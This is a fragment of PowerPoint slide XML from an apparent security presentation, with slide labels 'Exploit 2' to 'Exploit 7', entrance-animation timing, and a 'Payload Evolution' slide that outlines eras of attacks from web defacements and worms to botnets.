                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2789225"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333501" y="3503726"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="5003975"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="1219200"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="1981200"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 6a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="2643250"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 6b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3240975"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 6c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3862450"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 6d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="4914900"/>
            <a:ext cx="2514600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="flat" dir="tl">
                <a:rot lat="0" lon="0" rev="6600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="25400" contourW="8890">
              <a:bevelT w="38100" h="31750"/>
              <a:contourClr>
                <a:schemeClr val="accent2">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploit 7</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300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="900"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1200"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="3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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Payload Evolution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="5022850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Vandals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1998 – 2001 – Web Site Defacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Big Worms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 2001 – 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Rise of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2004 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>The Era of Purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>2006 - present</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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20" name="Rectangle 60"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="230188"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>The Era of Purpose</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 72" descr="101016_organ"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
